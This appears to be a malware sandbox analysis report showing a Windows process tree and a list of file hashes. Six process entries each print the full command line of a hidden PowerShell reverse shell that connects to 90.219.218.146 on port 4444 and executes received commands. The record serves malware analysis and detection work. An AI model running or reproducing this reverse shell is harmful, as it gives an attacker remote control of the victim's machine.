C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3556
-
-
-
C:\Windows\System32\GameBarPresenceWriter.exe"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer1⤵PID:5072
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:81⤵PID:3932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4792,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:81⤵PID:3592
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD58697c106593e93c11adc34faa483c4a0
SHA1cd080c51a97aa288ce6394d6c029c06ccb783790
SHA256ff43e813785ee948a937b642b03050bb4b1c6a5e23049646b891a66f65d4c833
SHA512724bbed7ce6f7506e5d0b43399fb3861dda6457a2ad2fafe734f8921c9a4393b480cdd8a435dbdbd188b90236cb98583d5d005e24fa80b5a0622a6322e6f3987
-
Filesize
83KB
MD56c7565c1efffe44cb0616f5b34faa628
SHA188dd24807da6b6918945201c74467ca75e155b99
SHA256fe63361f6c439c6aa26fd795af3fd805ff5b60b3b14f9b8c60c50a8f3449060a
SHA512822445c52bb71c884461230bb163ec5dee0ad2c46d42d01cf012447f2c158865653f86a933b52afdf583043b3bf8ba7011cc782f14197220d0325e409aa16e22
-
Filesize
264KB
MD5ce4df4dfe65ab8dc7ae6fcdebae46112
SHA1cdbbfda68030394ac90f6d6249d6dd57c81bc747
SHA256ffbe84f0a1eab363ca9cf73efb7518f2abd52c0893c7cc63266613c930855e96
SHA512fc8e39942e46e4494356d4a45257b657495cbfa20e9d67850627e188f70b149e22603ae4801b4ba7b9a04d201b3787899d2aee21565237d18e0afce9bae33ee9
-
Filesize
63KB
MD5f377a418addeeb02f223f45f6f168fe6
SHA15d8d42dec5d08111e020614600bbf45091c06c0b
SHA2569551431425e9680660c6baf7b67a262040fd2efceb241e4c9430560c3c1fafac
SHA5126f60bfac34ed55ff5d6ae10c6ec5511906c983e0650e5d47dac7b8a97a2e0739266cae009449cced8dff59037e2dbfc92065fbbdfde2636d13679e1629650280
-
Filesize
157KB
MD5b5355dd319fb3c122bb7bf4598ad7570
SHA1d7688576eceadc584388a179eed3155716c26ef5
SHA256b9bc7f1d8aa8498cb8b5dc75bb0dbb6e721b48953a3f295870938b27267fb5f5
SHA5120e228aa84b37b4ba587f6d498cef85aa1ffec470a5c683101a23d13955a8110e1c0c614d3e74fb0aa2a181b852bceeec0461546d0de8bcbd3c58cf9dc0fb26f5
-
Filesize
77KB
MD5f5dd9c5922a362321978c197d3713046
SHA14fbc2d3e15f8bb21ecc1bf492f451475204426cd
SHA2564494992665305fc9401ed327398ee40064fe26342fe44df11d89d2ac1cc6f626
SHA512ce818113bb87c6e38fa85156548c6f207aaab01db311a6d8c63c6d900d607d7beff73e64d717f08388ece4b88bf8b95b71911109082cf4b0c0a9b0663b9a8e99
-
Filesize
822KB
MD5d3a47ef5b669b3ab59aa27a54b015d24
SHA1d646309640b93ce05d268a00104d8a6ee6ee4463
SHA256b89ba73c7ce7a7800237401b351b047996f3c975f9e6ed401864f5481acf644f
SHA51209095fc7042a77f0c35f6a79d2c180b2660b613a82697a29662e39db80b3ed442c0433f915d17a271aba2f4f5c39615af2bac274de7095dd907413414d630dcc
-
Filesize
3.2MB
MD5cc4cbf715966cdcad95a1e6c95592b3d
SHA1d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA5123b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477
-
Filesize
4.3MB
MD511c051f93c922d6b6b4829772f27a5be
SHA142fbdf3403a4bc3d46d348ca37a9f835e073d440
SHA2560eabf135bb9492e561bbbc5602a933623c9e461aceaf6eb1ceced635e363cd5c
SHA5121cdec23486cffcb91098a8b2c3f1262d6703946acf52aa2fe701964fb228d1411d9b6683bd54527860e10affc0e3d3de92a6ecf2c6c8465e9c8b9a7304e2a4a6
-
Filesize
26KB
MD57a442bbcc4b7aa02c762321f39487ba9
SHA10fcb5bbdd0c3d3c5943e557cc2a5b43e20655b83
SHA2561dd7bba480e65802657c31e6d20b1346d11bca2192575b45eb9760a4feb468ad
SHA5123433c46c7603ae0a73aa9a863b2aecd810f8c0cc6c2cd96c71ef6bde64c275e0fceb4ea138e46a5c9bf72f66dcdea3e9551cf2103188a1e98a92d8140879b34c
-
Filesize
1.1MB
MD58320c54418d77eba5d4553a5d6ec27f9
SHA1e5123cf166229aebb076b469459856a56fb16d7f
SHA2567e719ba47919b668acc62008079c586133966ed8b39fec18e312a773cb89edae
SHA512b9e6cdcb37d26ff9c573381bda30fa4cf1730361025cd502b67288c55744962bdd0a99790cedd4a48feef3139e3903265ab112ec545cb1154eaa2a91201f6b34